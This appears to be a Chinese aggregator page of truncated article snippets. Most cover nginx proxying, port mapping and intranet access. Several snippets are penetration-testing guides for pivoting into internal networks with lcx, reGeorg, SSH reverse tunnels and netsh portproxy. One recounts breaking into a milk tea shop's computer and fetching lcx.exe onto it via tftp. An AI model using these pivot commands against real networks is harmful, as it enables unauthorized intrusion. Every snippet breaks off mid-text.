nginx根据访问的项目名进行内网地址转发 以下是nginx的配置信息: server { listen 8081; server_name localhost; #charset koi8-r; #access_log logs/host.access.log main; location / { root html; index index.html index.htm; } #匹配以访问的项目名跳转到对应的内网地址 location /huwj { proxy_pass http://12…

负载均衡-Nginx中文文档 http://www.nginx.cn/doc/example/loadbanlance.html 负载均衡 一个简单的负载均衡的示例,把www.domain.com均衡到本机不同的端口,也可以改为均衡到不同的地址上. http { : upstream myproject { : server 127.0.0.1:8000 weight=3; : server 127.0.0.1:8001; : server 127.0.0.1:8002; : server 12…

负载均衡-Nginx中文文档 http://www.nginx.cn/doc/example/loadbanlance.html 负载均衡 一个简单的负载均衡的示例,把www.domain.com均衡到本机不同的端口,也可以改为均衡到不同的地址上. http { : upstream myproject { : server 127.0.0.1:8000 weight=3; : server 127.0.0.1:8001; : server 127.0.0.1:8002; : server 12…

先上一个我的正常使用的配置 location / { proxy_pass http://192.168.1.84:80; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_connect_timeout 300s; proxy_rea…

  user www www;worker_processes 1;error_log logs/error.log;pid logs/nginx.pid;worker_rlimit_nofile 65535;events { use epoll; worker_connections 65535;}http{ include mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65;…

user www www; worker_processes ; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile ; events { use epoll; worker_connections ; } http{ include mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout ; gzip on…

传输层技术包括TCP隧道.UDP隧道和常规端口转发等.在渗透测试中,如果内网防火墙阻止了指定端口的访问,在获得目标机器的权限后,可以使用IPTABLES打开指定端口.如果内网中存在一系列防御系统,TCP.UDP流量会被大量拦截. 1.实验环境 window 7 (VPS机器):192.168.4.137 window 7(受害者):1.1.1.10 monowall防火墙:只允许通过TCP/UDP数据 2.网络拓扑图 内网win7通过lcx.exe,将自己主机的远程端口3389的数据流量通过端口…

对于付不起钱的小伙计,为了给公司省钱,想尽一切招数.今天就来分享一个使用阿里云OSS存储搭配CDN使用的网站服务器部署方法. 简介 阿里云OSS 阿里云提供的一种文件存储方案,和我们以前接触的百度云BCS和新浪云的Storage是一个道理,即文件的云端存储方案.一般而言,OSS只存储网站所需要的静态文件,而不存储程序文件.例如将网站的图片.视频.脚本.样式等文件存储在OSS,同时,OSS实际上有点类似我们以前使用的第三方服务商提供的相册,OSS上的文件,阿里云会给一个url让你可以直接使用.在依…

转自:http://www.cuiyongzhi.com/post/37.html 在前面几篇中我们一直说的开发准备工作主要是基于开发框架上的,这里我们说的就逐渐接近开发过程中的实体操作了,如果你之前还没有了解微信平台开发那么你或许是不知道的但是你现在是必须要知道的:[微信公众平台开发对接必须以http://或https://开头,分别支持80端口和443端口]! 这里我们就存在一个问题,因为我们平时在开发过程中进本都是在本地开发然后调试,那么我们如何能在本地开发并和微信服务端进行联调呢?由于微…

在虚拟机里面装了linux后,发现内网能访问,外网访问不了. 首先确定网络配置没有问题,并且能够访问外网,通过以下方法进行确认: [root@localhost ~]# more /etc/sysconfig/network-scripts/ifcfg-eth0  # Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) DEVICE=eth0 BOOTPROTO=none HWADDR=00:50:56:bd:00:56…

由于公司内网有多台服务器的 http 服务要映射到公司外网静态 IP,如果用路由的端口映射来做,就只能一台内网服务器的 80 端口映射到外网 80 端口,其他服务器的 80 端口只能映射到外网的非 80 端口.非 80 端口的映射在访问的时候要域名加上端口,比较麻烦. 我们可以在内网搭建一个Nginx反向代理服务器,将Nginx反向代理服务器的80映射到外网IP的80,这样指向到公司外网IP的域名的HTTP请求就会发送到Nginx反向代理服务器,利用Nginx反向代理将不同域名的请求转发到内网不…

在项目当中我们可能会遇到例如改变的项目名称之后,相对应的地址就需要改变,为了减少工作量,将地址当中的项目名这一块写成动态获取的,那么最关键一点就是我要先获取它,再进行操作: 知识点整理,话不多说,直接贴代码: 获取项目名: function URLPath(msg){ var pathName = window.document.location.pathname; var projectName = pathName.substring(0,pathName.substr(1).indexOf…

  >>>  先在web.xml中设置默认页面 <welcome-file-list> <welcome-file>/login.jsp</welcome-file> </welcome-file-list> >>> 再在tomcat安装目录中的conf文件夹中打开server.xml 进行如下设置 <Connector port="80" protocol="HTTP/1.1"…

一.应用场景 获取到目标边界机器linux服务器一台,想继而向内网其他机器渗透,获取到一台webshell发现处于内网当中且不通外网.可以通过linux ssh隧道对目标内网机器进行访问. 二.利用手法 ssh命令介绍: -C  压缩传输数据,加快传输速度 -f  后台对用户名密码进行认证 -N  仅仅只用来转发,不用再弹回一个新的shell -n  后台运行 -q  安静模式,不要显示警告等信息 -l  指定ssh登录名 -g  允许远程主机连接到本地转发的端口 -L  进行本地端口转发 -R…

Lcx.exe是一个端口转发工具,相当于把目标服务器A上的3389端口转发到具有外网ip地址的B机上(即我们自己的主机或是已经控制的主机),这样链接B机的3389端口就相当于链接A机的3389端口了,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用. 1.确定被控制…

reGeorg v1.0 git Usage $ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u [-v] Socks server for reGeorg HTTP(s) tunneller optional arguments: -h, --help show this help message and exit -l , --listen-on The default listening address -p , --listen-port The…

这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网IP即可. 这个工具之前折腾了很久发现有点不稳定,断掉无法重新连接,昨晚重新调整了下命令参数总算可以正常使用,稳定性妥妥的. linux版lcx工具下载 linux版lcx端口转发2016.6.10 - 12.04 Kb lcx使用方法: Usage:./portmap -m method [-h1…

导读 大家都知道SSH是一种安全的传输协议,用在连接服务器上比较多.不过其实除了这个功能,它的隧道转发功能更是吸引人. 如果两个内网之间的linux服务器需要互相登录,或需要互相访问内网某个端口,担忧没有公网IP,可以使用的方法有ngrok(https://ngrok.com/),但并不方便,我们只需两条 SSH 命令即可. 先给出本文主角,两条SSH命令: 远程端口转发(由远程服务器某个端口转发到本地内网服务器端口) ssh -CfNg -R(命令行的关键) 2222(远程服务器端口):127…

环境: 内网应用服务端口流量需要转发请求到外网端口 解决思路: firewalld 的富规则 d主机: 富规则 d主机对外dnat发布5423端口,然后dnat请求s的80端口: s主机snat返回80端口信息,d主机伪装后5423返回给f主机. CSDN链接  https://blog.csdn.net/jmkmlm123456/article/details/77131075…

一.利用场景 当前获取目标内网边界区域一台机器,可以通外网和内网也就是存在两块网卡,又通过其他手段获取到内网另外一台机器,但是这台机器不能出外网,所以我们可以使用windows自带netsh命令通过边界机器来连接内网不出网的机器. 二.利用手法 netsh firewall show config              查看防火墙配置 netsh firewall show state               查看当前系统防火墙状态 netsh interface portproxy s…

报找不到Jay包错误,在pom.xml文件中加这段 <repositories> <repository> <id>central</id> <url>file://c:\users\主机名\.m2\repository</url> </repository> </repositories>…

<script type="text/javascript"> function getUserIP(onNewIP) { // onNewIp - your listener function for new IPs //compatibility for firefox and chrome var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.w…

proxy_redirect http://test.abc.com:9080/ /;…

使用说明 Wlmap包括服务端程序和客户端程序两部分 服务端程序Wlmaps一般架设到其它用户可以访问到的地方例如internet,它主要用来记录客户端信息以及端口映射信息,并且转发用户和客户端之间数据.客户端程序主程序完成和Wlmaps的交互,包括认证.映射内部服务到Wlmaps的某个端口.维护数据转发通道同时转发Wlmaps和内部服务之间的数据交互. 第一部分: 服务端Wlmaps 1.如何运行Wlmaps DOS命令 : Wlmaps.exe -p -s -p:指定Wlmaps服务的端口,…

这几天在渗透一家奶茶店的时候, 使用溢出攻击获得了奶茶店shell, 截屏以后发现该电脑有安装sqlserver, 但是数据库无法远程连接, 所以我决定使用端口映射工具突破端口连接限制: 我的机器地址为:192.168.1.156 奶茶店的IP地址为: 192.168.1.157 1:上传lcx到目标机器 首先需要下载lcx这个工具: Pan Lcx这个工具我使用tftp上传到目标机器, 在目标的shell中执行: tftp -i 192.168.1.156 get lcx.exe 2:使用lc…

企业场景 一般在企业内部,开发.测试以及预生产都会有一套供开发以及测试人员使用的网络环境.运维人员会为每套环境的相关项目配置单独的Tomcat,然后开放一个端口,以 IP+Port 的形式访问.然而随着项目的增多,对于开发和测试人员记住如此多的内网地址,无疑是一件头疼的事情(当然你也可以使用浏览器书签管理器或者记录在某个地方).但是你不永远不会确定,那天由于升级突然改了IP,我们可能又要重新撸一遍配置,所以内网域名还是非常有必要的. 内网域名具体有哪些优点: 方便记忆 变更IP,只需要修改DNS…

通过Nginx代理实现内网主机访问公网和接口服务 1.需求: m2.test.com为公司测试环境的微信测试域名,因为要调用微信服务接口需要访问外网,现通过Nginx代理现实此功能. 2.环境如下: 10.20.9.31 为内网测试环境Nginx的代理主机,代理测试环境的java程序. 10.100.64.18 是Nginx反向代理主机,公网映射地址为:124.251.12.198,在此上面配置的域名通过解析后可以直接访问公网. 10.100.230.10 也是Nginx的代理主机,通过NAT转…

方法一 public static String getLocalIpAddress() { try { for (Enumeration<NetworkInterface> en = NetworkInterface .getNetworkInterfaces(); en.hasMoreElements();) { NetworkInterface intf = en.nextElement(); for (Enumeration<InetAddress> enumIpAddr…

1.获取内网地址(私有地址) ifconfig -a 2.获取外网地址(公网地址) curl members.3322.org/dyndns/getip…

在无内网路由管理员权限的情况下,需要将内网web应用暴露到公网访问,此时需要用到花生壳或者nat123(两个应用都不是免费的,其中花生壳可以8元认证,以后免费使用,nat123按天收费) 花生壳 http://hsk.oray.com/download/   nat123 http://www.nat123.com/Pages_2_32.jsp   在此以Nat123为说明 微信公众号需要用到80端口验证,所以,此处 80(http)网站 为例,应用名随便写,建议与web应用同名,便于区分,内网…